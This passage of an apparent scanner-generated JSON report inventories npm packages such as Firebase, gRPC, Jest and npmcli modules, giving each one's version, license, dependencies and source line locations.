"Identifier": { "PURL": "pkg:npm/%40firebase/messaging-interop-types@0.2.3", "UID": "36477b6f17353f93" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2996, "EndLine": 3001 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/performance@0.7.9", "Name": "@firebase/performance", "Identifier": { "PURL": "pkg:npm/%40firebase/performance@0.7.9", "UID": "e4d672b4047a01ec" }, "Version": "0.7.9", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1", "web-vitals@4.2.4" ], "Locations": [ { "StartLine": 3008, "EndLine": 3024 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/performance-compat@0.2.22", "Name": "@firebase/performance-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/performance-compat@0.2.22", "UID": "23d29551638b3ac" }, "Version": "0.2.22", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/performance-types@0.2.3", "@firebase/performance@0.7.9", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 3025, "EndLine": 3041 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/performance-types@0.2.3", "Name": "@firebase/performance-types", "Identifier": { "PURL": "pkg:npm/%40firebase/performance-types@0.2.3", "UID": "4f28b81b7e90e6b" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3048, "EndLine": 3053 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/remote-config@0.6.6", "Name": "@firebase/remote-config", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config@0.6.6", "UID": "5fbe1b0ef0568f39" }, "Version": "0.6.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/installations@0.6.19", "@firebase/logger@0.5.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 3060, "EndLine": 3075 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/remote-config-compat@0.2.19", "Name": "@firebase/remote-config-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config-compat@0.2.19", "UID": "af2e92f4a0453c1c" }, "Version": "0.2.19", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/logger@0.5.0", "@firebase/remote-config-types@0.4.0", "@firebase/remote-config@0.6.6", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 3076, "EndLine": 3092 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/remote-config-types@0.4.0", "Name": "@firebase/remote-config-types", "Identifier": { "PURL": "pkg:npm/%40firebase/remote-config-types@0.4.0", "UID": "74803f2cfea8db7b" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3099, "EndLine": 3104 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/storage@0.14.0", "Name": "@firebase/storage", "Identifier": { "PURL": "pkg:npm/%40firebase/storage@0.14.0", "UID": "f6e2fd12c92bc7bf" }, "Version": "0.14.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app@0.14.2", "@firebase/component@0.7.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 3111, "EndLine": 3127 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/storage-compat@0.4.0", "Name": "@firebase/storage-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/storage-compat@0.4.0", "UID": "33cf5626753d281a" }, "Version": "0.4.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-compat@0.5.2", "@firebase/component@0.7.0", "@firebase/storage-types@0.8.3", "@firebase/storage@0.14.0", "@firebase/util@1.13.0", "tslib@2.8.1" ], "Locations": [ { "StartLine": 3128, "EndLine": 3146 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/storage-types@0.8.3", "Name": "@firebase/storage-types", "Identifier": { "PURL": "pkg:npm/%40firebase/storage-types@0.8.3", "UID": "f48ff3e89e0f72ab" }, "Version": "0.8.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.3", "@firebase/util@1.13.0" ], "Locations": [ { "StartLine": 3153, "EndLine": 3162 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/util@1.13.0", "Name": "@firebase/util", "Identifier": { "PURL": "pkg:npm/%40firebase/util@1.13.0", "UID": "db825f66051b276d" }, "Version": "1.13.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 3169, "EndLine": 3181 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/webchannel-wrapper@1.0.4", "Name": "@firebase/webchannel-wrapper", "Identifier": { "PURL": "pkg:npm/%40firebase/webchannel-wrapper@1.0.4", "UID": "b2c0c01e633d9950" }, "Version": "1.0.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3188, "EndLine": 3193 } ], "AnalyzedBy": "npm" }, { "ID": "@gar/promisify@1.1.3", "Name": "@gar/promisify", "Identifier": { "PURL": "pkg:npm/%40gar/promisify@1.1.3", "UID": "f79a59d567ca65b6" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3194, "EndLine": 3200 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/grpc-js@1.9.15", "Name": "@grpc/grpc-js", "Identifier": { "PURL": "pkg:npm/%40grpc/grpc-js@1.9.15", "UID": "532701ac0a5b3e80" }, "Version": "1.9.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/proto-loader@0.7.15", "@types/node@24.7.0" ], "Locations": [ { "StartLine": 3201, "EndLine": 3213 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/proto-loader@0.7.15", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", "UID": "7928f7fffd2daf59" }, "Version": "0.7.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.4", "yargs@17.7.2" ], "Locations": [ { "StartLine": 3214, "EndLine": 3231 } ], "AnalyzedBy": "npm" }, { "ID": "@hapi/hoek@9.3.0", "Name": "@hapi/hoek", "Identifier": { "PURL": "pkg:npm/%40hapi/hoek@9.3.0", "UID": "22d5d7a9e9def86e" }, "Version": "9.3.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3232, "EndLine": 3238 } ], "AnalyzedBy": "npm" }, { "ID": "@hapi/topo@5.1.0", "Name": "@hapi/topo", "Identifier": { "PURL": "pkg:npm/%40hapi/topo@5.1.0", "UID": "7ed5c00c0d1ef03b" }, "Version": "5.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@hapi/hoek@9.3.0" ], "Locations": [ { "StartLine": 3239, "EndLine": 3248 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/balanced-match@4.0.1", "Name": "@isaacs/balanced-match", "Identifier": { "PURL": "pkg:npm/%40isaacs/balanced-match@4.0.1", "UID": "dd528aa69002bac2" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13529, "EndLine": 13536 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/brace-expansion@5.0.0", "Name": "@isaacs/brace-expansion", "Identifier": { "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", "UID": "8e954b8711d9795" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/balanced-match@4.0.1" ], "Locations": [ { "StartLine": 13537, "EndLine": 13547 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/cliui@8.0.2", "Name": "@isaacs/cliui", "Identifier": { "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", "UID": "1fb3060faa0cbadd" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width-cjs@4.2.3", "string-width@5.1.2", "strip-ansi-cjs@6.0.1", "strip-ansi@7.1.2", "wrap-ansi-cjs@7.0.0", "wrap-ansi@8.1.0" ], "Locations": [ { "StartLine": 3311, "EndLine": 3327 }, { "StartLine": 13548, "EndLine": 13565 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/fs-minipass@4.0.1", "Name": "@isaacs/fs-minipass", "Identifier": { "PURL": "pkg:npm/%40isaacs/fs-minipass@4.0.1", "UID": "fc0a6b7918b87a81" }, "Version": "4.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 13618, "EndLine": 13630 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/string-locale-compare@1.1.0", "Name": "@isaacs/string-locale-compare", "Identifier": { "PURL": "pkg:npm/%40isaacs/string-locale-compare@1.1.0", "UID": "9f428d7c910fe0bf" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13631, "EndLine": 13637 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/ttlcache@1.4.1", "Name": "@isaacs/ttlcache", "Identifier": { "PURL": "pkg:npm/%40isaacs/ttlcache@1.4.1", "UID": "88b0b1c11f1e2618" }, "Version": "1.4.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3407, "EndLine": 3415 } ], "AnalyzedBy": "npm" }, { "ID": "@istanbuljs/load-nyc-config@1.1.0", "Name": "@istanbuljs/load-nyc-config", "Identifier": { "PURL": "pkg:npm/%40istanbuljs/load-nyc-config@1.1.0", "UID": "461a4fd9d6048ab0" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "find-up@4.1.0", "get-package-type@0.1.0", "js-yaml@3.14.1", "resolve-from@5.0.0" ], "Locations": [ { "StartLine": 3416, "EndLine": 3431 } ], "AnalyzedBy": "npm" }, { "ID": "@istanbuljs/schema@0.1.3", "Name": "@istanbuljs/schema", "Identifier": { "PURL": "pkg:npm/%40istanbuljs/schema@0.1.3", "UID": "31e9bbdf807befbc" }, "Version": "0.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3515, "EndLine": 3523 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/create-cache-key-function@29.7.0", "Name": "@jest/create-cache-key-function", "Identifier": { "PURL": "pkg:npm/%40jest/create-cache-key-function@29.7.0", "UID": "5e63b125c76f5bf6" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3" ], "Locations": [ { "StartLine": 3590, "EndLine": 3601 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/environment@29.7.0", "Name": "@jest/environment", "Identifier": { "PURL": "pkg:npm/%40jest/environment@29.7.0", "UID": "7826de6146ae2019" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/fake-timers@29.7.0", "@jest/types@29.6.3", "@types/node@24.7.0", "jest-mock@29.7.0" ], "Locations": [ { "StartLine": 3602, "EndLine": 3616 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/fake-timers@29.7.0", "Name": "@jest/fake-timers", "Identifier": { "PURL": "pkg:npm/%40jest/fake-timers@29.7.0", "UID": "21bdb7e79f69ba9c" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@sinonjs/fake-timers@10.3.0", "@types/node@24.7.0", "jest-message-util@29.7.0", "jest-mock@29.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 3644, "EndLine": 3660 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/schemas@29.6.3", "Name": "@jest/schemas", "Identifier": { "PURL": "pkg:npm/%40jest/schemas@29.6.3", "UID": "7d01f972513ab39c" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sinclair/typebox@0.27.8" ], "Locations": [ { "StartLine": 3721, "EndLine": 3732 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/transform@29.7.0", "Name": "@jest/transform", "Identifier": { "PURL": "pkg:npm/%40jest/transform@29.7.0", "UID": "ded336d6ffd8fab2" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@jest/types@29.6.3", "@jridgewell/trace-mapping@0.3.31", "babel-plugin-istanbul@6.1.1", "chalk@4.1.2", "convert-source-map@2.0.0", "fast-json-stable-stringify@2.1.0", "graceful-fs@4.2.11", "jest-haste-map@29.7.0", "jest-regex-util@29.6.3", "jest-util@29.7.0", "micromatch@4.0.8", "pirates@4.0.7", "slash@3.0.0", "write-file-atomic@4.0.2" ], "Locations": [ { "StartLine": 3780, "EndLine": 3805 } ], "AnalyzedBy": "npm" }, { "ID": "@jest/types@29.6.3", "Name": "@jest/types", "Identifier": { "PURL": "pkg:npm/%40jest/types@29.6.3", "UID": "30d11510c2044def" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/schemas@29.6.3", "@types/istanbul-lib-coverage@2.0.6", "@types/istanbul-reports@3.0.4", "@types/node@24.7.0", "@types/yargs@17.0.33", "chalk@4.1.2" ], "Locations": [ { "StartLine": 3806, "EndLine": 3822 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/gen-mapping@0.3.13", "Name": "@jridgewell/gen-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", "UID": "59a23ce09ed9de75" }, "Version": "0.3.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/sourcemap-codec@1.5.5", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 3823, "EndLine": 3832 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/remapping@2.3.5", "Name": "@jridgewell/remapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/remapping@2.3.5", "UID": "52e1018d6912a7d3" }, "Version": "2.3.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 3833, "EndLine": 3842 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/resolve-uri@3.1.2", "Name": "@jridgewell/resolve-uri", "Identifier": { "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", "UID": "988fd01e25a61599" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3843, "EndLine": 3851 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/source-map@0.3.11", "Name": "@jridgewell/source-map", "Identifier": { "PURL": "pkg:npm/%40jridgewell/source-map@0.3.11", "UID": "f88ffe6a7b782fd0" }, "Version": "0.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 3852, "EndLine": 3861 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/sourcemap-codec@1.5.5", "Name": "@jridgewell/sourcemap-codec", "Identifier": { "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", "UID": "15bfc4709b69856" }, "Version": "1.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3862, "EndLine": 3867 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/trace-mapping@0.3.31", "Name": "@jridgewell/trace-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", "UID": "cc01dd57a433c93b" }, "Version": "0.3.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/resolve-uri@3.1.2", "@jridgewell/sourcemap-codec@1.5.5" ], "Locations": [ { "StartLine": 3868, "EndLine": 3877 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.scandir@2.1.5", "Name": "@nodelib/fs.scandir", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", "UID": "33f9a4a8ef1ef332" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "run-parallel@1.2.0" ], "Locations": [ { "StartLine": 3899, "EndLine": 3911 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.stat@2.0.5", "Name": "@nodelib/fs.stat", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", "UID": "ec91831ff847063d" }, "Version": "2.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3912, "EndLine": 3920 } ], "AnalyzedBy": "npm" }, { "ID": "@nodelib/fs.walk@1.2.8", "Name": "@nodelib/fs.walk", "Identifier": { "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", "UID": "ad58d83664468dfe" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.scandir@2.1.5", "fastq@1.19.1" ], "Locations": [ { "StartLine": 3921, "EndLine": 3933 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/agent@3.0.0", "Name": "@npmcli/agent", "Identifier": { "PURL": "pkg:npm/%40npmcli/agent@3.0.0", "UID": "7632afa959e64b2c" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "http-proxy-agent@7.0.2", "https-proxy-agent@7.0.6", "lru-cache@10.4.3", "socks-proxy-agent@8.0.5" ], "Locations": [ { "StartLine": 14981, "EndLine": 14995 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/agent@4.0.0", "Name": "@npmcli/agent", "Identifier": { "PURL": "pkg:npm/%40npmcli/agent@4.0.0", "UID": "f23fbdc6af1653c1" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "http-proxy-agent@7.0.2", "https-proxy-agent@7.0.6", "lru-cache@11.2.2", "socks-proxy-agent@8.0.5" ], "Locations": [ { "StartLine": 13638, "EndLine": 13654 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/arborist@9.1.6", "Name": "@npmcli/arborist", "Identifier": { "PURL": "pkg:npm/%40npmcli/arborist@9.1.6", "UID": "4456a9e769d5e004" }, "Version": "9.1.6", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/string-locale-compare@1.1.0", "@npmcli/fs@4.0.0", "@npmcli/installed-package-contents@3.0.0", "@npmcli/map-workspaces@5.0.0", "@npmcli/metavuln-calculator@9.0.2", "@npmcli/name-from-folder@3.0.0", "@npmcli/node-gyp@4.0.0", "@npmcli/package-json@7.0.1", "@npmcli/query@4.0.1", "@npmcli/redact@3.2.2", "@npmcli/run-script@10.0.0", "bin-links@5.0.0", "cacache@20.0.1", "common-ancestor-path@1.0.1", "hosted-git-info@9.0.2", "json-stringify-nice@1.1.4", "lru-cache@11.2.2", "minimatch@10.0.3", "nopt@8.1.0", "npm-install-checks@7.1.2", "npm-package-arg@13.0.1", "npm-pick-manifest@11.0.1", "npm-registry-fetch@19.0.0", "pacote@21.0.3", "parse-conflict-json@4.0.0", "proc-log@5.0.0", "proggy@3.0.0", "promise-all-reject-late@1.0.1", "promise-call-limit@3.0.2", "semver@7.7.3", "ssri@12.0.0", "treeverse@3.0.0", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 13655, "EndLine": 13700 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/config@10.4.2", "Name": "@npmcli/config", "Identifier": { "PURL": "pkg:npm/%40npmcli/config@10.4.2", "UID": "f44f6dd37243f898" }, "Version": "10.4.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/map-workspaces@5.0.0", "@npmcli/package-json@7.0.1", "ci-info@4.3.1", "ini@5.0.0", "nopt@8.1.0", "proc-log@5.0.0", "semver@7.7.3", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 13701, "EndLine": 13718 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/fs@1.1.1", "Name": "@npmcli/fs", "Identifier": { "PURL": "pkg:npm/%40npmcli/fs@1.1.1", "UID": "709e392631b38ea7" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@gar/promisify@1.1.3", "semver@7.7.3" ], "Locations": [ { "StartLine": 3934, "EndLine": 3944 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/fs@4.0.0", "Name": "@npmcli/fs", "Identifier": { "PURL": "pkg:npm/%40npmcli/fs@4.0.0", "UID": "578643750e37ce20" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 13719, "EndLine": 13729 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/git@7.0.0", "Name": "@npmcli/git", "Identifier": { "PURL": "pkg:npm/%40npmcli/git@7.0.0", "UID": "c2dac0b98614bce7" }, "Version": "7.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/promise-spawn@8.0.3", "ini@5.0.0", "lru-cache@11.2.2", "npm-pick-manifest@11.0.1", "proc-log@5.0.0", "promise-retry@2.0.1", "semver@7.7.3", "which@5.0.0" ], "Locations": [ { "StartLine": 13730, "EndLine": 13747 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/installed-package-contents@3.0.0", "Name": "@npmcli/installed-package-contents", "Identifier": { "PURL": "pkg:npm/%40npmcli/installed-package-contents@3.0.0", "UID": "2a279910279e5f52" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-bundled@4.0.0", "npm-normalize-package-bin@4.0.0" ], "Locations": [ { "StartLine": 13748, "EndLine": 13762 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/map-workspaces@5.0.0", "Name": "@npmcli/map-workspaces", "Identifier": { "PURL": "pkg:npm/%40npmcli/map-workspaces@5.0.0", "UID": "90bb5525fc07076c" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/name-from-folder@3.0.0", "@npmcli/package-json@7.0.1", "glob@11.0.3", "minimatch@10.0.3" ], "Locations": [ { "StartLine": 13763, "EndLine": 13776 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/metavuln-calculator@9.0.2", "Name": "@npmcli/metavuln-calculator", "Identifier": { "PURL": "pkg:npm/%40npmcli/metavuln-calculator@9.0.2", "UID": "b6eedb73c7f8b840" }, "Version": "9.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cacache@20.0.1", "json-parse-even-better-errors@4.0.0", "pacote@21.0.3", "proc-log@5.0.0", "semver@7.7.3" ], "Locations": [ { "StartLine": 13777, "EndLine": 13791 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/move-file@1.1.2", "Name": "@npmcli/move-file", "Identifier": { "PURL": "pkg:npm/%40npmcli/move-file@1.1.2", "UID": "4700456a38b747a8" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mkdirp@1.0.4", "rimraf@3.0.2" ], "Locations": [ { "StartLine": 3958, "EndLine": 3972 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/name-from-folder@3.0.0", "Name": "@npmcli/name-from-folder", "Identifier": { "PURL": "pkg:npm/%40npmcli/name-from-folder@3.0.0", "UID": "e58208e2b8b4fbed" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13792, "EndLine": 13799 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/node-gyp@4.0.0", "Name": "@npmcli/node-gyp", "Identifier": { "PURL": "pkg:npm/%40npmcli/node-gyp@4.0.0", "UID": "f19a8d4d63901e89" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13800, "EndLine": 13807 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/package-json@7.0.1", "Name": "@npmcli/package-json", "Identifier": { "PURL": "pkg:npm/%40npmcli/package-json@7.0.1", "UID": "b9e2a71d6cc7b1ec" }, "Version": "7.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "glob@11.0.3", "hosted-git-info@9.0.2", "json-parse-even-better-errors@4.0.0", "proc-log@5.0.0", "semver@7.7.3", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 13808, "EndLine": 13824 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/promise-spawn@8.0.3", "Name": "@npmcli/promise-spawn", "Identifier": { "PURL": "pkg:npm/%40npmcli/promise-spawn@8.0.3", "UID": "42d4c8a2d08f9b79" }, "Version": "8.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "which@5.0.0" ], "Locations": [ { "StartLine": 13825, "EndLine": 13835 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/query@4.0.1", "Name": "@npmcli/query", "Identifier": { "PURL": "pkg:npm/%40npmcli/query@4.0.1", "UID": "d558d185fbab590f" }, "Version": "4.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-selector-parser@7.1.0" ], "Locations": [ { "StartLine": 13836, "EndLine": 13846 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/redact@3.2.2", "Name": "@npmcli/redact", "Identifier": { "PURL": "pkg:npm/%40npmcli/redact@3.2.2", "UID": "c881395ad7eca136" }, "Version": "3.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13847, "EndLine": 13854 } ], "AnalyzedBy": "npm" }, { "ID": "@npmcli/run-script@10.0.0", "Name": "@npmcli/run-script", "Identifier": { "PURL": "pkg:npm/%40npmcli/run-script@10.0.0", "UID": "a0517891f2c49621" }, "Version": "10.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/node-gyp@4.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "node-gyp@11.4.2", "proc-log@5.0.0", "which@5.0.0" ], "Locations": [ { "StartLine": 13855, "EndLine": 13870 } ], "AnalyzedBy": "npm" }, { "ID": "@pkgjs/parseargs@0.11.0", "Name": "@pkgjs/parseargs", "Identifier": { "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", "UID": "43b8f37e228c5046" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3973, "EndLine": 3982 }, { "StartLine": 13871, "EndLine": 13881 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/aspromise@1.1.2", "Name": "@protobufjs/aspromise", "Identifier": { "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", "UID": "9e186767cf428422" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3983, "EndLine": 3988 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/base64@1.1.2", "Name": "@protobufjs/base64", "Identifier": { "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", "UID": "8b2ca4b86e757b35" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3989, "EndLine": 3994 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/codegen@2.0.4", "Name": "@protobufjs/codegen", "Identifier": { "PURL": "pkg:npm/%40protobufjs/codegen@2.0.4", "UID": "f497e2c6710c141e" }, "Version": "2.0.4", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { 